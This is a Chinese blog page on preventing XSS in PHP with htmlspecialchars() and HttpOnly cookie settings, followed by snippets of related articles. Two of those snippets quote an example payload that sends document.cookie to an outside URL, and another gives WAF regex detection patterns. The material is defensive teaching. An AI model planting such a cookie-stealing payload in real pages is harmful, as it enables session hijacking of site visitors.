PHP的XSS防御

最新推荐文章于 2024-04-09 17:27:09 发布
最新推荐文章于 2024-04-09 17:27:09 发布
阅读量422 收藏
点赞数
分类专栏: PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/spacex_91/article/details/104491456
版权
本文介绍了XSS攻击的概念和危害,重点阐述了PHP防止XSS跨站脚本攻击的方法,包括使用htmlspecialchars()函数对非法HTML代码进行转义,以及通过设置php.ini配置session.cookie_httponly为true来启用HttpOnly属性,增强Cookie的安全性。
摘要由CSDN通过智能技术生成

XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。

理论上,只要存在能提供输入的表单并且没做安全过滤或过滤不彻底,都有可能存在XSS漏洞。
PHP防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。

htmlspecialchars() 函数相当于单引号的功能,不会进行解释,你输入什么就是什么。

针对盗取用户cookie信息可以设置PHP的全局配置php.ini:

  • session.cookie_httponly = true

设置其值为1或者TRUE,来开启全局的Cookie的HttpOnly属性。

原理:Cookie都是通过document对象获取的,我们如果能让cookie在浏览器中不可见就可以了,那HttpOnly就是在设置cookie时接受这样一个参数,一旦被设置,在浏览器的document对象中就看不到cookie了。而浏览器在浏览网页的时候不受任何影响,因为Cookie会被放在浏览器头中发送出去(包括Ajax的时候),应用程序也一般不会在JS里操作这些敏感Cookie的,对于一些敏感的Cookie我们采用HttpOnly,对于一些需要在应用程序中用JS操作的cookie我们就不予设置,这样就保障了Cookie信息的安全也保证了应用。

当然也支持在代码中来开启: 

<?php 

ini_set("session.cookie_httponly", 1);   
// or session_set_cookie_params(0, NULL, NULL, NULL, TRUE);   

Cookie操作函数setcookie函数和setrawcookie函数也专门添加了第7个参数来做为HttpOnly的选项,开启方法为: 

<?php  
setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);   
setrawcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);  


 

「已注销」
关注
专栏目录
XSS防御方法
墨痕诉清风的博客
03-14 2375
XSS防御是复杂的。流行的浏览器都内置了一些对抗XSS的措施,比如Firefox的CSP,Noscript扩展,IE8内置的XSS Filter等。而对于网站来说,也应该寻找优秀的解决方案,保护用户不被XSS攻击。 1)HttpOnly HttpOnly最早是由微软提出,并在IE 6中实现的,至今已成为一个标准。浏览器将禁止页面的JavaScript访问带有HttpOnly属性的Cookie。严格来说,HttpOnly并非为了对抗XSS--HttpOnly解决的是XSS后的Cookie劫持。 一个C
web安全之XSS攻击及防御pdf
08-25
### Web安全之XSS攻击及防御 #### 一、XSS基本原理 ##### 1.1 什么是XSS 跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web应用程序安全漏洞,其形成原因主要是由于Web应用程序对用户输入的数据过滤不...
PHP跨站脚本攻击(XSS)防范方案
m0_66326520的博客
04-09 1298
反射型XSS攻击是将注入的恶意脚本添加到一个网址中,然后给用户发送这个网址。一旦用户打开这个网址,就会执行脚本并导致攻击。攻击负载和脚本跟随用户点击链接,并被嵌入到响应中,在浏览器上执行。存储型 XSS 攻击指的是攻击者将恶意脚本提交到受害网站的数据库中,当其他用户浏览包含该恶意脚本链接的页面时,就会执行该脚本,从而导致攻击者的目的得以实现。由于是将恶意脚本保存在数据库中,所有访问包含恶意代码的页面的用户都受到攻击。而且这种攻击方式难解决。
php_XSS防攻击插件
05-29
php编辑器或者文本域获取js传值 js写入防止被攻击XSS;有demo使用手册
PHPXSS跨站攻击
Haohappy的专栏
01-17 4189
其实这个话题很早就想说说了,发现国内不少PHP站点都有XSS漏洞。今天偶然看到PHP5的一个XSS漏洞,在此小结一下。顺便提醒,使用PHP5的朋友最好打下补丁,或者升级一下。如果你不懂什么是XSS,可以看这里,或者这里(中文的也许会好懂一些)。国内不少论坛都存在跨站脚本漏洞,例如这里  有一个Google Hack+XSS的攻击例子,针对的是Discuz 4.0.0RC3。国外也很多这样的例子,甚
php+防御+xss,PHP防御XSS攻击
weixin_39777464的博客
04-04 165
XSS即跨站脚本工具例如我在你的评论上写了alert('楼主傻逼');然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下document.location="http://www.test.com/a.php?b="+document.cookie;通过这种方式,你的所有cookie就会被发送到对应的网站去,然后你就呵呵了~~~~所以我们应该要过滤掉...
PHPXSS脚本攻击
weixin_42177572的博客
12-29 287
新建php文件,并写入以下代码 <?php /* 功能说明:防护XSS,SQL,代码执行,文件包含等多种高危漏洞 */ $url_arr=array( 'xss'=>"\\=\\+\\/v(?:8|9|\\+|\\/)|\\%0acontent\\-(?:id|location|type|transfer\\-encoding)", ); $args_arr=array( 'xss'=>"[\\'\\\"\\;\\*\\<\\>].*\\bon[a-zA-Z]{3,15}[
PHP防御XSS攻击
Lisam Blog
12-15 2457
XSS即跨站脚本工具 例如我在你的评论上写了 alert('楼主傻逼'); 然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下 document.location="http://www.test.com/a.php?b="+document.cookie; 通过这种方式,你的所有cookie就会被发送到对应的网站去
xss防御php利用httponly防xss攻击
10-26
例如,反射型XSS和DOM型XSS攻击往往不依赖于Cookie,因此除了使用HttpOnly之外,还需要通过其他安全措施来全面防御XSS攻击,比如内容安全策略(CSP)、输入验证、输出编码等。此外,由于Web浏览器和服务器实现的差异...
基于PHPxss平台安全监测与CSRF防御设计源码
最新发布
09-28
该项目是一款基于PHP的综合性安全监测平台,旨在应对XSS攻击和CSRF防御。源码包含299个文件,涵盖238个PHP脚本、21个HTML模板、15个CSS样式表、5个JavaScript脚本、2个文本文件、1个Git忽略文件、1个Markdown文档、1...
PHP 防护XSS,SQL,代码执行,文件包含等多种高危漏洞
05-21
1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
PHPXSS跨站攻击的防范
10-30
PHPXSS跨站攻击的防范
PHP防范XSS攻击
IT部落格
03-03 2812
定义 XSS(Cross Site Scripting)攻击,中文名为跨站脚本攻击,是一种常见的网页攻击方式。 攻击者在web页面中插入一些恶意的javascript或HTML代码,当用户浏览该页面的时候,嵌入到web页面中的javascript/HTML代码会被执行,从而达到攻击目的。 一个简单的例子就是网页中的评论功能,用户编写一段javascript代码(见下面)提交到服务器,如果不做过滤就直接显示出来的话,就会导致用户一打开页面就会有弹窗提示“你被攻击了”。 <script>window
PHP "完美"的防XSS 防SQL注入的代码 喷
libo_sina的专栏
06-21 986
function gjj($str) {     $farr = array(         "/\\s+/",         "/]*?)>/isU",         "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU",     );     $str = preg_replace($farr,"",$str);     return addslashes
PHP如何防止XSS攻击
weixin_30411819的博客
05-17 611
PHP防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。 在使用htmlspecialchars()函数的时候注意第二个参数, 直接用htmlspecialchars($string) 的话,第二个参数默认是ENT_COMPAT,函数默认只是转化双引号(“), 不对单引号(‘)做转义. 所以,htmlspecialchars函...
php 防护xss,PHP防御XSS注入的终极解决方案
weixin_42547431的博客
03-10 554
PHP防御XSS注入的终极解决方案【信息安全】【Hack】一:PHP直接输出html的,可以采用以下的方法进行过滤:1.htmlspecialchars函数2.htmlentities函数3.HTMLPurifier.auto.php插件4.RemoveXss函数(百度可以查到)二:PHP输出到JS代码中,或者开发Json API的,则需要前端在JS中进行过滤:1.尽量使用innerText(I...
PHP防止Xss攻击
weixin_30650859的博客
07-31 76
mysql_real_escape_string() 所以得SQL语句如果有类似这样的写法:"select * from cdr where src =".$userId; 都要改成 $userId=mysql_real_escape_string($userId) 所有有打印的语句如echo,print等 在打印前都要使用htmlentities() 进行过滤,这样可以防止Xss,注意中文要写出...
phpxss攻击的防范
dancheng1的博客
07-16 516
Xss:cross site script 跨脚本攻击 Xss攻击本质:通过标签(一对尖括号)来达到攻击的目的,所以我们只需要将尖括号 进行 转义,这就是php中提到的实体转义。   Htmlspecialchars函数和htmlentites函数 所有表单输入的地方,都需要实体转义,以下为转义函数: function deepspecialchars($data){ if(emp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值